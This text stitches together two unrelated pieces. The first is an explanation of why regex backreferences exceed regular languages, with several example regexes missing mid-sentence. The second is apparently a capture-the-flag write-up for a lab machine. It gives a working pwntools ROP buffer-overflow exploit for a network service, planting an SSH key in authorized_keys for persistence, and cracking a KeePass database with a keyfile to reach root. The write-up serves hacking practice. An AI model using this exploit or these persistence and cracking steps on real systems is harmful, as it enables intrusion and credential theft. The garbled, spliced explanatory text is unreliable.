To get directly at your question, you should make a short study of the Chomsky Hierarchy. This is an old and beautiful way of organizing formal languages in sets of increasing complexity. The lowest rung of the hierarchy is the Regular Languages. You might guess - and you'd be right - that the RL's are exactly those that can be represented with "pure" regular expressions: Those with only the alphabet, empty string, concatenation, alternation |, and Kleene star * (look Ma, no back references). A classic theorem of formal language theory - Kleene's Theorem - is that DFAs, NFAs (as described in the article you cited), and regular expressions all have exactly the same power to represent and recognize languages. Thompson's construction given in the article is a part of the theorem's proof.
Every RL is also a CFL. But there are infinitely many CFLs that aren't regular. A feature that can exist in CFL's that makes them too complex to be regular is balanced pairs of things: parentheses, begin-end blocks, etc. Nearly all programming languages are CFLs. CFLs can be efficiently recognized by what's called a pushdown automaton This essentially a NFA with a stack glued on. The stack grows to be as big as needed, so it's no longer a finite automaton. Parsers of real programming languages are nearly all variations on pushdown automata.
Consider the regex with backreference
In words, this represents strings of length 2n for some n, where both the n'th and 2n'th characters are
This is exactly why back references cause problems! They allow "regular expressions" that represent languages that aren't regular. Therefore there is no NFA or DFA that can ever recognize them.
But wait, it's even worse than I've made it out to be so far. Consider
We now have a string of length 3n where the n'th, 2n'th, and 3n'th elements are
Back references allow these supercharged regexes to represent languages that are three rungs up the Chomsky Hierarchy: the Context Sensitive Languages. Roughly speaking, the only way to recognize a CSL is to check all strings in the language of equal length (at least if P!=NP, but that's true for all practical purposes and a different story altogether). The number of such strings is exponential in the length of the one you're matching.
This is why the searching regex matcher is needed. You can be very clever in the way you design the search. But there will always be some input that drives it to take exponential time.
So I agree with the author of the paper you cited. It's possible to write perfectly innocent looking regexes with no back refs that will be efficiently recognized for nearly all inputs, but where there exists some input that causes a Perl or Java or Python regex matcher - because it is a backtracking search - to require millions of years to complete the match. This is crazy. You can have a script that's correct and works fine for years and then locks up one day merely because it stumbled onto one of the bad inputs. Suppose the regex is buried in the message parser of the navigation system in the airplane you're riding...
By request, I'll sketch how the Pumping lemma can be used to prove the language
Proof of the PL depends on the fact that every regular language corresponds to some DFA. An accepted input to this DFA longer than its number of states (which equates to L in the lemma) must cause it to "loop:" to repeat a state. Call this state X. The machine consumes some string R to get from the start to X, then S to loop back to X, then T to get to an accepting state. Well, adding extra copies of S (or else deleting S) in the input correspond only to a different number of "loops" from X back to X. Consequently, the new string with additional (or deleted) copies of S will also be accepted.
Since every RL must satisfy the PL, a proof that a language is not regular proceeds by showing that it contradicts the PL. For our language, this is not hard. Suppose you are trying to convince me the language L =
Since it's not regular, Kleene's theorem tells us there is no DFA nor FA nor "pure" regex that describes it.
The proof that back refs allow languages that aren't even context free has a very similar ring but needs background on pushdown automata that I'm not going to give here. Google will provide.
NB: Both of these fall short of proof that back refs make recognition NP complete. They merely say in a very rigorous way that back refs add real complexity to pure regular expressions. They allow languages that can't be recognized with any machine having finite memory, nor any with only an infinitely large LIFO memory. I will leave NP completeness proof to others.
The fast NFA/DFA algorithms discussed in the linked article, Regular Expression Matching Can Be Simple And Fast, are fast because they can work with a finite number of states (independent of input length) as described in the article.
Introducing backreferences makes the number of states (almost) "infinite" (in worst case about 256n where n is the length of the input). The number of states grows because every possible value of every backreference becomes a state of the automata.
Thus using a finite-state machine is no longer fitting/possible, and backtracking algorithms have to be used instead.
There's some excellent examples in this tutorial:
The particular case that you will be interested in is shown in 'Backtracking Into Capturing Groups' - it's explained there how the whole match can be given up several times before the final one can be found that matches the whole regex. Also, it's worth noting that this might lead to unexpected matches.
Very interesting document: Extending Finite Automata to Efficiently Match Perl-Compatible Regular Expressions, support back-references and counted occurrences efficiently with modified NFA.
|
OPCFW_CODE
|
Machine IP: 10.10.10.147
DATE : 16/09/2019
START TIME: 8:42 PM
I’ve got two open port and one filtered port. Obviously we’ll start our enumeration with HTTP service.
If we visit the Website we’ll get the ` Apache2 Debian Default Page
I ran gobuster` on it but found nothing there.
It says something about
myapp and port
1337. So First I visited the URL
http://10.10.10.147/myapp which gave me an
myapp. This was an ELF binary which is supposedly
echoing back the command we enter but we don’t see any output.
You can follow Ippsec’s Bitterman to understand the process of exploiting this binary.
from pwn import * r = remote('10.10.10.147', '1337') # Found offset: 120 junk1 = b"\x90" * 120 junk2 = b"\x90" * 16 shtext = b"/bin/sh\x00" # just 8 bytes. r.recvuntil("average") r.recvuntil("\n") plt_system = p64(0x401040) plt_main = p64(0x40115f) pop_r131415_ret = p64(0x401206) # pop the shtext inside stack, then fill others with nop mov_rsp_to_rdi = p64(0x401156) # followed with a jmp r13 payload = junk1 + pop_r131415_ret + plt_system + junk2 + mov_rsp_to_rdi + shtext + plt_main r.send(payload) r.interactive()
This exploit will give us shell on the system.
If we look at the
user's home directory we can see some images, password file and user flag.
First I got the user flag.
Once I had the User flag. I decided to get the
user's SSH key but it didn’t had any. The
.ssh folder in
/home/user only had an
authorized_key so I decided to copy my own Public key there so I can login via ssh.
We can see that there are lot of images there so I downloaded it and used some steganography but none of them had anything in it. So I shifted my focus to
MyPasswords.kdbx. I downloaded the file using
➜ scp email@example.com:/home/user/MyPasswords.kdbx ./
Then I ran
$ keepass2john MyPasswords.kdbx > hash.txt
And tried cracking it but then @FolkLore_93 gave me hint that I need to use
Images as one of the
So I started using one after the other and
$ ➜ keepass2john -k IMG_0547.JPG MyPasswords.kdbx > hash.txt
This gave me password in a minute.
Once I had the cracked password I used that and the image file used before to open the database and in that I found the password for the
After that I did
su root and used that password to become root.
Thanks for reading, Feedback is always appreciated
Follow me @0xmzfr for more “Writeups”.
|
OPCFW_CODE
|